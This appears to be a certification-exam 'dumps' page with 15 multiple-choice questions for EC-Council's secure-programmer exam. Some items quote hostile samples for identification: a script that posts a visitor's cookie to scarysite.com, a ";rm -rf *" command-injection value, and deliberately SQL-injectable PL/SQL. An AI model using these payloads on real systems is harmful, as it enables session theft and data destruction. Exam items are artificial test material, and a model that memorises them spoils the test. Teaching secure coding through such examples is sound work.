ECCouncil 312-92 Dumps

ECCouncil
EC-Council Certified Secure Programmer v2

Questions & Answers for ECCouncil 312-92

Showing 1-15 of 99 Questions

Question #1

Simon is writing an application that will use RPC to talk between a client and server. He will
use authentication, but in his application the server does not have to know the RPC
caller's identity. What type of RPC authentication can Simon use for this application?

A. UNIX authentication

B. ANONYMOUS authentication

C. DES authentication

D. NULL authentication

Question #2

What compression library is used by wiretap, the packet analyzer reader for Wireshark?

A. wtapbil

B. pclib

C. winrar

D. zllib

Question #3

Why would a software development firm want to fix any issues with a program at the design
stage as opposed to fixing issues with a program through a patch release?

A. Releasing a patch costs 25 times as much as fixing the issue in the design stage

B. Releasing a patch costs 5 times as much as fixing the issue in the design stage

C. Releasing a patch is actually the most efficient and cost effective way of solving issues

D. Releasing a patch costs 60 times as much as fixing the issue in the design stage

Question #4

What vulnerability is the following code susceptible to?
CREATE OR REPLACE PROCEDURE demo (name IN VARCHAR2) AS
  cursor_name INTEGER;
  rows_processed INTEGER;
  sql VARCHAR2(150);
  code VARCHAR2(2);
BEGIN
  ...
  -- the statement is assembled by string concatenation of the parameter
  sql := 'SELECT postal_code FROM states WHERE state_name = ''' || name || '''';
  cursor_name := DBMS_SQL.OPEN_CURSOR;
  DBMS_SQL.PARSE(cursor_name, sql, DBMS_SQL.NATIVE);
  DBMS_SQL.DEFINE_COLUMN(cursor_name, 1, code, 10);
  rows_processed := DBMS_SQL.EXECUTE(cursor_name);
  DBMS_SQL.CLOSE_CURSOR(cursor_name);
END;

A. SQL string manipulation

B. DBMS_Open string attacks

C. Oracle injection

D. SQL injection

Question #5

In the following socket programming code, who will the server allow connections from?
#include <sys/socket.h>
#include <netinet/in.h>
#include <unistd.h>

int main(void)
{
    int s1, s2;
    struct sockaddr_in sin;

    s1 = socket(AF_INET, SOCK_STREAM, 0);
    sin.sin_port = htons(30);
    sin.sin_family = AF_INET;
    sin.sin_addr.s_addr = 0;          /* 0 is INADDR_ANY */
    bind(s1, (struct sockaddr *)&sin, sizeof(sin));
    listen(s1, 10);
    s2 = accept(s1, NULL, NULL);
    write(s2, "hello\n", 6);
    return 0;
}

A. Only those coming in on TCP port 10

B. Only those on the same subnet as the server

C. Only those coming in on UDP port 10

D. Anyone

Question #6

Gerald is a web security consultant for Protectors International. Gerald's main responsibility
is to search the Internet for malicious and deceitful sites that the public should be aware of.
Gerald was tipped off about a particular site and is now looking over its source code in a
protected environment. Gerald finds the following snippet particularly interesting. What has
Gerald stumbled upon?
<script>
document.write('<form name=hack method=post action="http://scarysite.com/getit.php">' +
  '<input type=hidden name=sid value="' + escape(document.cookie) + '">');
document.hack.submit();
</script>

A. Hidden post command

B. Hidden form fields

C. JavaScript hijacking

D. XSS attack

Question #7

Paul wants to capture audit information on PLSQL so he executes the following command:
sqlplus sys / as sysdba
Enter password: password123!!!!
SQL> ALTER SYSTEM SET AUDIT_TRAIL = OS SCOPE=SPFILE;
SQL> SHUTDOWN NORMAL;
SQL> STARTUP;
What privileges has Paul logged on with?

A. ADMIN

B. Root

C. SYSDBA

D. SYS

Question #8

What would be the output of the following script?
import java.net.*;

public class ExampleByName {
    public static void main(String[] args) {
        try {
            InetAddress address = InetAddress.getByName("www.microsoft.com");
            System.out.println(address);
        } catch (UnknownHostException e) {
            System.out.println("Could not find www.microsoft.com");
        }
    }
}

A. IP address of www.microsoft.com

B. Hexadecimal equivalent for www.microsoft.com

C. Tracert information to the www.microsoft.com

D. Whois information for www.microsoft.com

Question #9

Harold is creating an Oracle Label Security Policy on his server. He has defined the policy
and defined the components of the labels already. Now Harold creates the labels
dynamically using the TO_DATA_LABEL function:
INSERT INTO emp (ename, empnum, hr_label)
VALUES ('FGRIFFIN', 10, to_data_label('HR', 'SENSITIVE'));
Harold gets an error referring to permission when he tries to run this function. What
authority must Harold have to run the TO_DATA_LABEL function?

A. EXECUTE

B. WRITE

C. INSERT

D. CREATE

Question #10

William, a software developer just starting his career, was asked to create a website in
PHP that would allow visitors to enter a month and a year for their birth date. The PHP
code he creates has to validate the input after it is entered. If William uses the following
code, what could a malicious user input to the year value to actually delete the whole
website?
$month = $_GET['month'];
$year = $_GET['year'];
exec("cal $month $year", $result);
print "<PRE>";
foreach($result as $r)
print "$r<BR>";
print "</PRE>";

A. ";gf -rm *"

B. ";dfr -php *"

C. ";php -rf *"

D. ";rm -rf *"

Question #11

George is writing an application in Java and is using DES in the code to implement the
encryption and decryption of data that will be passed. In the following code snippet, what
will be accomplished?
FileOutputStream out = new FileOutputStream(f);
out.write(rawkey);

A. Convert the secret key to an array of bytes

B. Generate a secret TripleDES encryption key

C. Writes the raw key to a file

D. Send the raw key to a decryption output array

Question #12

What testing methodology does not require any knowledge of the internal design or code of
a software application?

A. Integration testing

B. White box testing

C. Black box testing

D. Unit testing

Question #13

Mathew is working on a Fedora machine and is having issues with some shellcode he
wrote that is producing errors. Mathew decides to download and use Ktrace to debug the
shellcode to see where the errors are originating from. Why will his plan not work?

A. Ktrace cannot debug errors, it only notifies of successful calls

B. Ktrace only works on Windows platforms

C. Ktrace cannot debug shellcode

D. Ktrace only works on *BSD platforms

Question #14

Shayla is designing a web-based application that will pass data to and from a company
extranet. This data is very sensitive and must be protected at all costs. Shayla will use a
digital certificate and a digital signature to protect the data. The digital signature she has
chosen to use is based on the difficulty in computing discrete logarithms. Which digital
signature has she chosen?

A. Rabin

B. Diffie-Hellman

C. SA-PSS

D. ElGamal

Question #15

Julie wants to use some of the Security and Trust Services API's for a program she is
writing that will work with mobile devices. Which SATSA security package should Julie use
if she needs to support basic user-certificate management?

A. javax.crypto.pki

B. javax.microedition.crypto

C. javax.microedition.pki

D. javax.security.crypto
